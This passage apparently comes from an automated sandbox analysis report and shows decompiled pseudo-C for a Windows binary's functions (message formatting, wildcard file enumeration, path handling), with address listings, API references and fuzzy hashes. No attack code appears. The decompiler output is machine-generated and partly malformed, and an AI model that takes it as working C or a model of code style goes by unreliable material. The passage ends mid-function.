Part of subcall function 0017A1E5: GetDC.USER32(00000000), ref: 0017A1EE
Part of subcall function 0017A1E5: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00179F7A,?,?,?), ref: 0017A21D
Part of subcall function 0017A1E5: ReleaseDC.USER32(00000000,?), ref: 0017A2B5

Strings

(, xrefs: 0017A0A3

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 3eb6890eec22b7449fffcd6230560d642c5ad695d4988a3cfaed0ff69f0569cf
Instruction ID: 435709512db89de6403f60c6dabd5130bf01fea8dde354a3e2a1a7a522b6ef36
Opcode Fuzzy Hash: 3eb6890eec22b7449fffcd6230560d642c5ad695d4988a3cfaed0ff69f0569cf
Instruction Fuzzy Hash: DD810F71208214AFD714DF68C844A2ABBF9FFC8714F40891EF99AD7260DB31AD45DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00170E37, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00170E37(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x72;
				if(_t47 > 0) {
					__eflags = _t26 - 0x80;
					if(_t26 == 0x80) {
						E0017CD24();
						_t28 = E0016DDD1(_t41, 0x96);
						return E00179F35( *0x1a844c, E0016DDD1(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0016DDD1(_t41));
						_push( *_t44);
						L19:
						_t32 = E0017AE88();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M001710FF))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0016DDD1(__ecx, 0xc8) =  &_v516;
										__eax = E0016400A( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E0017AE88( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0016DDD1(_t41);
							L7:
							_push(0);
							L8:
							return E0017AE88();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M001710A7))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E0017A5F8();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0016DDD1(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0016DDD1(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0016DDD1(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x00170e37
0x00170e41
0x00170e43
0x00170e46
0x00170e49
0x00171070
0x00171075
0x00171077
0x00171083
0x00000000
0x0017109a
0x00170e4f
0x00170e4f
0x00171066
0x00170f93
0x00170f98
0x00170f99
0x00170ed6
0x00170ed6
0x00170e9f
0x00000000
0x00170e9f
0x00170e55
0x00170e58
0x00170f58
0x00170f5b
0x0017101b
0x0017101b
0x0017101e
0x0017105c
0x00000000
0x0017105c
0x00171020
0x00171020
0x00171023
0x00171055
0x00000000
0x00171055
0x00171025
0x00171025
0x00171028
0x00171048
0x0017104b
0x00000000
0x0017104b
0x0017102a
0x0017102a
0x0017102d
0x0017103e
0x00000000
0x0017103e
0x0017102f
0x0017102f
0x00171032
0x00171034
0x00000000
0x00171034
0x00170f61
0x00170f61
0x00171014
0x00000000
0x00171014
0x00170f67
0x00170f6a
0x00170f6d
0x00170f73
0x00000000
0x00170f7a
0x00000000
0x00000000
0x00170f84
0x00000000
0x00000000
0x00170f8e
0x00000000
0x00000000
0x00170fa0
0x00000000
0x00000000
0x00170fa4
0x00000000
0x00000000
0x00170fa8
0x00170fab
0x00000000
0x00000000
0x00170fb2
0x00000000
0x00000000
0x00170fb9
0x00000000
0x00000000
0x00170fc0
0x00170fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00170fcd
0x00170fd0
0x00000000
0x00000000
0x00170fe5
0x00170ff1
0x00170ff6
0x00170ff9
0x00170fff
0x00000000
0x00000000
0x00170f73
0x00170f6d
0x00170e5e
0x00170e5e
0x00170f4f
0x00170f51
0x00170ef3
0x00170ef3
0x00170e7b
0x00170e7b
0x00170e7d
0x00000000
0x00170e82
0x00170e67
0x00170e6d
0x00000000
0x00170e8a
0x00170e8c
0x00170e91
0x00000000
0x00000000
0x00170e74
0x00170e76
0x00000000
0x00000000
0x00170e98
0x00170e9a
0x00000000
0x00000000
0x00170ea5
0x00170ea8
0x00000000
0x00000000
0x00170eb4
0x00170eb7
0x00000000
0x00000000
0x00170ebb
0x00170ebe
0x00000000
0x00000000
0x00170ec2
0x00170ec5
0x00000000
0x00000000
0x00170ecc
0x00170ece
0x00170ed3
0x00170ed4
0x00000000
0x00000000
0x00170ede
0x00170ee1
0x00000000
0x00000000
0x00170ee5
0x00170ee8
0x00000000
0x00000000
0x00170eec
0x00170eee
0x00000000
0x00000000
0x00170efb
0x00170efd
0x00000000
0x00000000
0x00170f04
0x00170f07
0x00000000
0x00000000
0x00170f0e
0x00170f11
0x00000000
0x00000000
0x00000000
0x00000000
0x00170f18
0x00170f1b
0x00170f23
0x00000000
0x00000000
0x00170f38
0x00170f3b
0x00000000
0x00000000
0x00170f42
0x00170f45
0x00170eaa
0x00170eaf
0x00170eb0
0x00000000
0x00000000
0x00170e6d
0x00170e67
0x00170e58
0x001710a3
0x001710a3

APIs

_swprintf.LIBCMT ref: 00170FF1

Strings

%ls, xrefs: 00170E76, 00170E8C
%s: %s, xrefs: 00171000

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: daf5388d164210e959d0829e40825a3a2b7a5a4b1c43b604096db6d1c9adf096
Instruction ID: a3893eed29c79105cd784e17e68e5e8f2989bae46fa59f6076135172f5002ee9
Opcode Fuzzy Hash: daf5388d164210e959d0829e40825a3a2b7a5a4b1c43b604096db6d1c9adf096
Instruction Fuzzy Hash: 7F51D97168C700FEEB3A1AE8DD02F367676AB1CB00F22C906F7DE648D5CB9255906752

Uniqueness

Uniqueness Score: -1.00%

Function 0018A918, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0018A918(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00187956(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0018E8A2(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00188849();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E001885A9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0018E8A2(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0018ACE7(_a12, _t193, __eflags, _t213);
													E001884DE(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0018E8A2(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00188849();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x19e668; // 0xd6971696
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0018E8F0(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E0017F350(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00185A90(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E0018A900);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0017EC4A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E001884DE(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E0018E8B0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0018ACC2( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0018895A();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00188839();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0018a91d
0x0018a920
0x0018a926
0x0018a93e
0x0018a941
0x0018a945
0x0018a947
0x0018a949
0x0018a94b
0x0018a94e
0x0018a951
0x0018a954
0x0018a956
0x0018a9ae
0x0018a9ae
0x0018a9b4
0x0018a9b6
0x0018a9c1
0x0018a9c5
0x0018a9c7
0x0018a9ca
0x0018a9ce
0x0018a9ce
0x0018a9d0
0x0018a9d2
0x0018a9d4
0x0018a9d6
0x0018a9d6
0x0018a9d8
0x0018a9db
0x0018a9de
0x0018a9de
0x0018a9e0
0x0018a9e1
0x0018a9e1
0x0018a9ec
0x0018a9ee
0x0018a9f1
0x0018a9f2
0x0018a9f5
0x0018a9f5
0x0018a9f9
0x0018a9fc
0x0018a9ff
0x0018a9ff
0x0018aa0d
0x0018aa0f
0x0018aa12
0x0018aa14
0x0018aa1e
0x0018aa21
0x0018aa24
0x0018aa26
0x0018aa29
0x0018aa2b
0x0018aa7b
0x0018aa7e
0x0018aa7e
0x0018aa80
0x00000000
0x0018aa2d
0x0018aa2f
0x0018aa2f
0x0018aa31
0x0018aa34
0x0018aa34
0x0018aa39
0x0018aa3c
0x0018aa3c
0x0018aa3e
0x0018aa3f
0x0018aa3f
0x0018aa43
0x0018aa46
0x0018aa46
0x0018aa49
0x0018aa4c
0x0018aa59
0x0018aa5e
0x0018aa61
0x0018aa63
0x0018aa9d
0x0018aa9e
0x0018aa9f
0x0018aaa0
0x0018aaa1
0x0018aaa2
0x0018aaa7
0x0018aaab
0x0018aaad
0x0018aaae
0x0018aab1
0x0018aab1
0x0018aab4
0x0018aab4
0x0018aab6
0x0018aab7
0x0018aab7
0x0018aac0
0x0018aac1
0x0018aac4
0x0018aac7
0x0018aaca
0x0018aacc
0x0018aad3
0x0018aad5
0x0018aad8
0x0018aae2
0x0018aae5
0x0018aae6
0x0018aae8
0x0018aafc
0x0018aafc
0x0018aaff
0x0018ab09
0x0018ab0e
0x0018ab11
0x0018ab13
0x00000000
0x0018ab15
0x0018ab19
0x0018ab22
0x0018ab28
0x00000000
0x0018ab2b
0x0018aaea
0x0018aaea
0x0018aaf0
0x0018aaf5
0x0018aaf8
0x0018aafa
0x0018ab31
0x0018ab33
0x0018ab34
0x0018ab35
0x0018ab36
0x0018ab37
0x0018ab38
0x0018ab3d
0x0018ab40
0x0018ab41
0x0018ab43
0x0018ab49
0x0018ab50
0x0018ab53
0x0018ab56
0x0018ab57
0x0018ab5a
0x0018ab5b
0x0018ab5e
0x0018ab5f
0x0018ab80
0x0018ab80
0x0018ab82
0x00000000
0x00000000
0x0018ab67
0x0018ab69
0x0018ab6b
0x0018ab6d
0x0018ab6f
0x0018ab71
0x0018ab73
0x0018ab7e
0x00000000
0x0018ab7e
0x0018ab73
0x0018ab6f
0x00000000
0x0018ab6b
0x0018ab84
0x0018ab86
0x0018ab89
0x0018aba2
0x0018aba2
0x0018aba4
0x0018aba7
0x0018abb7
0x0018abb9
0x0018abb9
0x0018aba9
0x0018aba9
0x0018abac
0x00000000
0x0018abae
0x0018abae
0x0018abb1
0x00000000
0x0018abb3
0x0018abb3
0x0018abb3
0x0018abb1
0x0018abac
0x0018abc7
0x0018abcb
0x0018abd9
0x0018abde
0x0018abf3
0x0018abf5
0x0018abfb
0x0018abfe
0x0018ac30
0x0018ac30
0x0018ac35
0x0018ac3b
0x0018ac3b
0x0018ac42
0x0018ac5c
0x0018ac5c
0x0018ac5d
0x0018ac63
0x0018ac69
0x0018ac6a
0x0018ac6b
0x0018ac70
0x0018ac73
0x0018ac75
0x00000000
0x00000000
0x00000000
0x00000000
0x0018ac44
0x0018ac44
0x0018ac4a
0x0018ac4c
0x00000000
0x0018ac4e
0x0018ac4e
0x0018ac51
0x00000000
0x0018ac53
0x0018ac53
0x0018ac5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0018ac5a
0x0018ac51
0x0018ac4c
0x00000000
0x0018ac77
0x0018ac7f
0x0018ac85
0x0018ac87
0x0018ac87
0x0018ac8f
0x0018ac94
0x0018ac9c
0x0018ac9f
0x0018aca1
0x0018acb5
0x0018acba
0x0018ac00
0x0018ac00
0x0018ac01
0x0018ac02
0x0018ac03
0x0018ac04
0x0018ac0c
0x0018ac0c
0x0018ac0c
0x0018ac0e
0x0018ac11
0x0018ac14
0x0018ac14
0x0018ab8b
0x0018ab8e
0x0018ab90
0x00000000
0x0018ab92
0x0018ab92
0x0018ab95
0x0018ab96
0x0018ab97
0x0018ab98
0x0018ab9d
0x0018ab90
0x0018ac1c
0x0018ac21
0x0018ac2c
0x00000000
0x00000000
0x00000000
0x0018aafa
0x0018aace
0x0018aad0
0x0018ab2c
0x0018ab30
0x0018ab30
0x00000000
0x00000000
0x00000000
0x00000000
0x0018aa65
0x0018aa68
0x0018aa6b
0x0018aa6e
0x0018aa71
0x0018aa74
0x0018aa77
0x0018aa77
0x00000000
0x0018aa34
0x0018aa16
0x0018aa16
0x0018aa82
0x0018aa84
0x00000000
0x0018aa89
0x0018a958
0x0018a958
0x0018a95b
0x0018a964
0x0018a967
0x0018a96e
0x0018a970
0x0018a989
0x0018a98a
0x0018a98b
0x0018a98d
0x0018a992
0x0018a972
0x0018a972
0x0018a975
0x0018a976
0x0018a978
0x0018a97a
0x0018a97c
0x0018a981
0x0018a981
0x0018a995
0x0018a997
0x0018a999
0x00000000
0x00000000
0x0018a99f
0x0018a9a2
0x0018a9a4
0x0018a9a6
0x00000000
0x0018a9a8
0x0018a9a8
0x0018a9ab
0x00000000
0x0018a9ab
0x00000000
0x0018a9a6
0x0018aa8a
0x0018aa8d
0x0018aa92
0x00000000
0x0018aa95
0x0018a928
0x0018a928
0x0018a92f
0x0018a930
0x0018a932
0x0018a937
0x0018aa96
0x0018aa9a
0x0018aa9a
0x00000000

APIs

_free.LIBCMT ref: 0018AA84

Part of subcall function 00188849: IsProcessorFeaturePresent.KERNEL32(00000017,00188838,00000050,00193958,?,0016CFE0,00000004,001A0EE8,?,?,00188845,00000000,00000000,00000000,00000000,00000000), ref: 0018884B
Part of subcall function 00188849: GetCurrentProcess.KERNEL32(C0000417,00193958,00000050,001A0EE8), ref: 0018886D
Part of subcall function 00188849: TerminateProcess.KERNEL32(00000000), ref: 00188874

Strings

*?, xrefs: 0018A95B
., xrefs: 0018AC3B

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction ID: 5cdaa18bfca9028714118d1506691d6c06663c9305c0a1c82343bc959baee8b1
Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
Instruction Fuzzy Hash: E5518D71E0020AAFEF14EFA8C981AADB7B5EF58314F65816AE854A7340E7319E01CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0016772B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0016772B(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0017E28C(E00191DF0, _t108);
				E0017E360();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E0016FE56(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E0016792E(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4084, 0x800);
					_t113 =  *((short*)(_t108 - 0x4084)) - 0x3a;
					if( *((short*)(_t108 - 0x4084)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E0016FE2E(__eflags, _t108 - 0x1014, _t108 - 0x4084, _t101);
							E001670BF(_t108 - 0x3084);
							_push(0);
							_t54 = E0016A4C6(_t108 - 0x3084, _t99, __eflags, _t106, _t108 - 0x3084);
							_t85 =  *(_t108 - 0x207c);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E0016A444(_t106, _t85 & 0xfffffffe);
							}
							E00169619(_t108 - 0x203c);
